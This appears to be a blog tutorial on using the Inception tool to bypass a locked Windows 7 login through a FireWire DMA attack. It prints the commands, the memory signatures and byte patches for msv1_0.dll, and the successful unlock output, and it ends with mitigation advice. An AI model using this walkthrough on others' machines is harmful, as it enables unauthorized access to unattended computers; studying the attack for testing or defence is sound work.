This brief note illustrates how simple it is to circumvent password protected machines, even if they have encrypted hard drives and the latest patches with a great little tool called Inception.

Inception is a useful tool if you’re doing close quarters security testing, i.e. you have physical access to the target device, think, a laptop left in a coffee shop or an employees desk at lunchtime and you’re on the right tracks.

Inception exploits a well known PCI memory vulnerability by tricking the target machine into thinking it has a legitimate device connecting to it. Once the target makes this assumption it enables DMA so that the connecting device can start transferring data across, this you will see is a bad idea. The beauty of this exploit is that if the machine is up and the exploit is found it can completely by-pass any hard-disk encryption (TPM, Bcrypt, TrueCrypt etc)!

In enabling the DMA the target machine has allowed any connecting device to have full read/write access to it and inception exploits this by trawling through memory looking for known patterns, patterns such as password managers!  Once a pattern is found inception then modifies the memory location by-passing any authentication and allowing the attacker unrestricted access to the device.

Let’s have a look.

Inception will tell you if you don’t have a device connected (or it is a device it doesn’t recognise)

$ sudo incept -v

 _|  _|      _|    _|_|_|  _|_|_|_|  _|_|_|    _|_|_|  _|    _|_|    _|      _|
 _|  _|_|    _|  _|        _|        _|    _|    _|    _|  _|    _|  _|_|    _|
 _|  _|  _|  _|  _|        _|_|_|    _|_|_|      _|    _|  _|    _|  _|  _|  _|
 _|  _|    _|_|  _|        _|        _|          _|    _|  _|    _|  _|    _|_|
 _|  _|      _|    _|_|_|  _|_|_|_|  _|          _|    _|    _|_|    _|      _|

v.0.2.4 (C) Carsten Maartmann-Moe 2013
Download: http://breaknenter.org/projects/inception | Twitter: @breaknenter

[!] No FireWire devices detected on the bus
[!] Attack unsuccessful

Connecting a target machine like this:
logintbsm

Will get you with something like this:

$ sudo incept -v

 _|  _|      _|    _|_|_|  _|_|_|_|  _|_|_|    _|_|_|  _|    _|_|    _|      _|
 _|  _|_|    _|  _|        _|        _|    _|    _|    _|  _|    _|  _|_|    _|
 _|  _|  _|  _|  _|        _|_|_|    _|_|_|      _|    _|  _|    _|  _|  _|  _|
 _|  _|    _|_|  _|        _|        _|          _|    _|  _|    _|  _|    _|_|
 _|  _|      _|    _|_|_|  _|_|_|_|  _|          _|    _|    _|_|    _|      _|

v.0.2.4 (C) Carsten Maartmann-Moe 2013
Download: http://breaknenter.org/projects/inception | Twitter: @breaknenter

[*] FireWire devices on the bus (names may appear blank):
------------------------------------------------------------------------------------------------------
[1] Vendor (ID): MICROSOFT CORP. (0x50f2) | Product (ID):  (0x0)
------------------------------------------------------------------------------------------------------
[*] Only one device present, device auto-selected as target
[*] Selected device: MICROSOFT CORP.
[*] Available targets:
------------------------------------------------------------------------------------------------------
[1] Windows 8: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[2] Windows 7: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[3] Windows Vista: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[4] Windows XP: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[5] Mac OS X: DirectoryService/OpenDirectory unlock/privilege escalation
[6] Ubuntu: libpam unlock/privilege escalation
[7] Linux Mint: libpam unlock/privilege escalation
------------------------------------------------------------------------------------------------------
[?] Please select target (or enter 'q' to quit):

Select the appropriate target, as you can see, this vulnerability is even in Windows 8, this is because this isn’t an OS issue but a fundamental problem with the SBP-2 protocol used by PCI devices.

 

In this case I’m attacking a Windows 7 machine, so once you kick inception off it will start to trawl through memory looking for an attack vector. This can take a few minutes depending on the amount of memory and speed of the machine.

[*] Selected target: Windows 7: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[*] The target module contains the following signatures:
------------------------------------------------------------------------------------------------------
	Versions:	SP0, SP1
	Architectures:	x86, x64

		Offsets:	0x2a8, 0x2a1, 0x291, 0x321
		Signature:	0xc60f85________b8
		Patch:		0x909090909090
		Patch offset:	0x1

		Offsets:	0x926
		Signature:	0x83f8107513b0018b
		Patch:		0x83f8109090b0018b
		Patch offset:	0x0

		Offsets:	0x312
		Signature:	0x83f8100f8550940000b0018b
		Patch:		0x83f810909090909090b0018b
		Patch offset:	0x0
------------------------------------------------------------------------------------------------------
[*] Initializing bus and enabling SBP-2, please wait  1 seconds or press Ctrl+C
[*] DMA shields should be down by now. Attacking...

Note: Inception can only read the lower 4GB of memory but this is usually enough to get a bypass in, if the target does have more than 4GB of RAM installed the password may not be visible to inception.

If you’re lucky though after a few minutes you should get the success message!

[===================================>                               ] 2205 MiB ( 54%) {76e85c8efeff8bf88b4508}
[*] Signature found at 0x89e0e321 (in page # 564750)
[*] Data read back: 0x909090909090
[*] Write-back verified; patching successful
[*] BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!

 

Inception has successful bypassed the Windows lock authentication, so any password you type (even a blank one) will work!
Logged insm

Note: This change is only temporary, so a reboot will reset it back to the original password.

If you want to protect yourself against these sort of attacks, then I suggest disabling all Firewire ports, blocking SBP-2 (http://support.microsoft.com/kb/2516445) or shutting down your machine if you’re going to be away for any more than 5 minutes.

Inception is included in Kali Linux and from the CERT-FORENSICS repository for Fedora distributions. The Inception web site can be found here: http://www.breaknenter.org/projects/inception/

Enjoy.

(3529)

Tagged with:
 

Leave a Reply

Your email address will not be published. Required fields are marked *